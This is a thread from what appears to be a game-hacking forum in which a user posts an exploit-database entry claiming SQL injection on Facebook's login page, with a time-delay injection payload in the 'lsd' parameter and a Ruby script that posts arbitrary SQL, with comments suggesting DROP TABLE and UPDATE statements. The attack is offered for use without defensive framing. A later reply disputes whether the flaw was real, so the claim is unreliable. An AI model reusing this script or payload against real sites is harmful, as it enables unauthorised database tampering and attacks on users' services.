DebateFort - Where Warriors Come To Debate
RAGECRY - Funny, Amusing, Interesting, Trending & Viral Videos and Images
GameOrc - Free Flash Games Online
Results 1 to 5 of 5
  1. #1
    Choob Callo's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    France
    Posts
    25
    Reputation
    10
    Thanks
    2
    My Mood
    Fine

    login.facebook.com SQL Injection Vulnerability

    Hello !

    My team partner have made an SQL Injection on login.facebook.com.
    Now, this exploit isn't working because Facebook fix this vulnerability !


    Code:
    ==============================================
    login.facebook.com SQL Injection Vulnerability
    ==============================================
    
    
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : Inj3ct0r.com                                  0
    1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
    0                                                                      0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    # SQL Injection
    # Path Sensitive : https://login.facebook.com/login.php?login_attempt=1
    # Fault Find By Gsk2 | Whivack
    # Code By Gsk2 | Whivack
    # Variable POST Sensitive : lsd
    # Thanks Team Guru-Security-Klan (www.gsk2.fr) and www.Inj3ct0r.com (Exploit Database) by r0073r
    # Contact Me : whivackwdcompany@gmail.com (French)
    # Useful Software : Ruby 1.8.6
    # Download Ruby 1.8.6 : http://www.ruby-lang.org
    # Demonstration Command : lsd=hUwMm%27%29%3Bwaitfor+delay+%270%3A0%3A15%27%3B--
    # Result Command : <script type="text/**********"> ->
    # var fbpd={"charset_test":"\u20ac,\u00b4,\u20ac,\u00b4,\u6c34,\u0414,\u0404","locale":"fr_FR","email":"gurusecurityklan@gsk2.fr","lsd":"hUwMm'); ->
    # wait for delay '0:0:15';--"};#</script>
    
    require 'net/http'
    require 'net/https'
    
    http = Net::HTTP.new('login.facebook.com', 443)
    http.use_ssl = true
    path = '/login.php'
    resp, data = http.get(path, nil)
    cookie = resp.response['set-cookie']
    
    # DROP TABLE ... CREATE TABLE ... CREATE VIEW ... UDPATE ...
    data = "lsd=%27[SQL Instruction]--"
    
    headers = {
    ? 'Cookie' => cookie,
    ? 'Referer' => 'https://login.facebook.com/login.php',
    ? 'Content-Type' => 'application/x-www-form-urlencoded'
    }
    resp, data = http.post(path, data, headers)
    puts 'Code = ' + resp.code
    
    
    # Inj3ct0r.com [2010-06-24]
    ++Callo++

  2. The Following User Says Thank You to Callo For This Useful Post:

    Chairman Mao (11-23-2010)

  3. #2
    Banned
    BANNED!
    shahin7777's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    Some where with a lot of hot chicks!
    Posts
    672
    Reputation
    6
    Thanks
    323
    My Mood
    Angelic
    Could you give a video tutorial or at least write a tutorial?

  4. #3
    Threadstarter
    Choob
    Callo's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    France
    Posts
    25
    Reputation
    10
    Thanks
    2
    My Mood
    Fine
    Quote Originally Posted by shahin7777 View Post
    Could you give a video tutorial or at least write a tutorial?
    No, you just need to compile it with a Ruby interpretor.

  5. #4
    Advanced Member
    MPGH Member
    craig1690's Avatar
    Join Date
    Jun 2010
    Gender
    male
    Location
    Behind you
    Posts
    247
    Reputation
    13
    Thanks
    109
    My Mood
    Amazed
    Just because you get a parse error or banner information doesn't mean its vuln, it could just be an error with php / mysql syntax you dumbfuck.

  6. The Following User Says Thank You to craig1690 For This Useful Post:

    NutriGrain (10-09-2010)

Similar Threads

  1. Replies: 4
    Last Post: 02-18-2014, 06:40 PM
  2. Replies: 2
    Last Post: 11-02-2009, 11:34 PM
  3. JAMM CMS (id) Blind SQL Injection Vulnerability
    By Mr.Dark Shark!! in forum Exploits
    Replies: 4
    Last Post: 08-03-2008, 10:55 AM
  4. Question about SQL Injections
    By darkounet in forum General Game Hacking
    Replies: 0
    Last Post: 06-29-2007, 11:13 PM
  5. KO can be sql injected
    By sf0d in forum General Game Hacking
    Replies: 2
    Last Post: 01-26-2006, 09:50 PM